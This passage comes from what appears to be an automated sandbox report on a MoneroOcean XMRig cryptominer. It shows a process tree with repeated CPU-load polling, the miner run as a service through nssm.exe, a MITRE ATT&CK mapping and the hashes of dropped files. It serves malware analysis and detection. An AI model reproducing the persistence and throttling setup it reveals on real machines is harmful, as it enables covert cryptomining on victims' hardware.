    PID:2476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1308
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:64
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4948
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3020

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4008
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2292

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
41766921a6e7803a5a3d9e17155aebc1

SHA1
29e5f780b111c895fcf46daeeb94c74154576f36

SHA256
22eecb37ad34c60918f3f9987b88bf2f4bb5b9adf401368c3360524ed8023b86

SHA512
e9f15d4948fd87bb4381856f02a28d79671fa92dd902aa282bff0c61fe83097b420f544f49db1b4c459d30eed2f0b51974d7535d7965ba04531bc2396f7bd878

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c5f2dbcd261ea2309a63aaca2b60435b

SHA1
d46a5423e7b8d9600f8113abd64ddbce28787bd8

SHA256
3fd17ea049c483fbc734d6b9196ebba3914bcdfe0b762206903d5e25c6da6351

SHA512
f8bbd1a159c246ed312a82e1ea3dd7d39cbdc83f8632c968d748d800fdf7240ae771f40ed455698b94fc1fb146f636c9c775ee123c7e93d5ab7aa8c886fd2374

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b05c758f1c5e164017f283daba3d420b

SHA1
5f18f26a6530bd1bc9386405dd9cea78a9a871ff

SHA256
35fec2e84c6cdd1f84595d179d08e2e9e3838acbd08976489edc8921974b05f3

SHA512
ab65375ebde3e65ae46b105b9b15847fdd04a916bd3398438f4fe0c3b40c9430ba2b6b3c8f5be290dc24c9fc9fce40b28c4fc02d824ca7654b7c535c9669e57e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3d3400fb73fbe8d5b40bd68366ee5f06

SHA1
3a881975d48a0ba785dfd116a6e9d3ba1b4ad79c

SHA256
8fa2cb5d596870aaba392659360b56f177f3144c8caa9680ba6c3244f2687a1f

SHA512
2e49585d2600ee3207426dce1105936782b84f4c2f7c0e86cd939c23fc4fe82c6b5c279c90e664136f7cd886ef8e9fdc24d259e912d47ae7f0347ed73fea7996

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
54dc457f01f51107dc1db86f022a90ab

SHA1
c1cbe5b4931d1d5ac2fdd6b6cc6fd4441f1c9840

SHA256
66df8cef56f2077c2ea68b826c78d9baad7ce62c59b360d0bbdd6d4c0b3097c1

SHA512
ee882379039fd2a290a51e38922a20b71e767716b4b10f6fe6f6e031eb4f55b35f9d5b521cb7ce54dd0c1db28206bc389ed2a8f2927d1d39398896df06bb98b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9682cb4b6cfc277825586c446a105b05

SHA1
c237c505b0df5a2f6c768a9238def758ea41a522

SHA256
1c93b72b3ab4d047c0b6ac22bb120b19590837b322bcd45ef0fd23b4b87880f4

SHA512
ae89d2430d19c2db91a2da2d5c8b533c64471dc56ec29a61d6397776be86d5ebe07e5c5b4b32f979fff4012b43fc6f1f9a6c38d9e584af12ce5d4e2f15dd9117

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb4d127b8a6f84a1cee423c5e3e3a51d

SHA1
c55263a8ff097067f2393ce2120801a445fd1949

SHA256
d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514

SHA512
45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2560193d633f8ba31eb1b92cc174e43b

SHA1
55af0ddc43fe63c28627968623da45fc0c0fea74

SHA256
efd907c391e98e01852551cfe18d33ef32545510406d41690cbebedf26770fe6

SHA512
2200765d29a2bc88011d1c4509cadd0408154649206efb6495ab92ed29117709d698723660198c63a1b4b3433d612690bf6c1454d59c74a3f74a1f07a5c51fd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb2ea3a49ca72738967871aae57b23a3

SHA1
0590e634b3f46affc612becf90a9b117ab82deda

SHA256
c72ee7b516d55b7bc9e3279f3e15af863edfe1423f3f693121e6632948114af0

SHA512
f10b746e8c6f942e42dbdd5e73dbb609ea1d98b9dbf389dfde930205b1b85a5770b01765411b7718adffe6a7f9cf85e137e4f7b4a6b6b1bb70f897665a78e640

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2b1197120326a33663f426ba4a827059

SHA1
3a37f3a77ced744194e8aed477b592110fd3a480

SHA256
c109609b2c0e5d85d63db58f76be777d61689e24fda709fe79aac97d76aae906

SHA512
24fcf75626289b9429ddc69f52b1a02f20a2493de9e32d34aeecf8b66230058cac93115782ee5b32232a1705443edffb9d18ab2487be807b310104a7053f0146

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ku5kucre.2vi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4EEB.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
7ead4f1c9e973764bdc15b1c3b4d1505

SHA1
b2c57f3f80077611a7a2dd0c406af898ce72a5ca

SHA256
934b4726a1a13ee9167122689cbf2138a6eb0d2375955f038c3a5665552f585b

SHA512
1840461f95ef7cb149f0ad7c0a309bd0878d434714fb023750810e3b7637d709f17dae934605a3102e19490bdab39b02024f155294631c7c67e51dfa16a64631

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9191cde3c58d6e7f5fb44ee3dd1d96c

SHA1
3988cf83f53323df0b7f44b6fcf3bcbdef5e5632

SHA256
bdc004bad834d025b1e879134190aaee5ad4d925fa4977023866a0abdc1d5a80

SHA512
4f477120c238a5b00a52753413ae44098f25ddc9529cc9759abc944e4deee123efc52afa88c51ebdc14c9edb3ce270bcd8a01cc3c689cd911cd82ca285cf066f

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
a502b9db867de073881b5662fda6ffbd

SHA1
f40b7092055b3e3ab1bd045f5100673c11f6d529

SHA256
edc95c0741cb4e72ba96f33df2b4ad43b7c1d1d4c6a4787a00580abc70122f59

SHA512
11fff57bd3163de9f669242b09f5b8db45178b0f069790efa73d02f220e15e5b2738a636a3b4fc0ac77c14b375c2aa57a94ef11eb2f77fa10ec5eedec230dd79

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config_background.json

Filesize
2KB

MD5
c7fd155f9e1be4dbb74f3582df799123

SHA1
012e091b2d9f325e9de3819d5b671a303bc50922

SHA256
0874dc9f30f5e6a004baa7d996895fd0d9d2cbcf72537e5b9daaffe6edde8cd6

SHA512
8a23e220d5323b7f1ac9cda1d7651f8d7f633e89945468be05e362853f08d63162f15f966c53e05c548776fecb60281179cd32ad11a43d53f06a294ab9880126

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1820-65-0x0000000001230000-0x0000000001250000-memory.dmp

Filesize
128KB

Download
memory/1820-66-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2088-200-0x00007FFBBC140000-0x00007FFBBCC01000-memory.dmp

Filesize
10.8MB

Download
memory/2088-0-0x00007FFBBC143000-0x00007FFBBC145000-memory.dmp

Filesize
8KB

Download
memory/2088-12-0x00007FFBBC140000-0x00007FFBBCC01000-memory.dmp

Filesize
10.8MB

Download
memory/2088-11-0x00007FFBBC140000-0x00007FFBBCC01000-memory.dmp

Filesize
10.8MB

Download
memory/2088-1-0x0000019EFEB80000-0x0000019EFEBA2000-memory.dmp

Filesize
136KB

Download
memory/2292-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-230-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-262-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2292-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
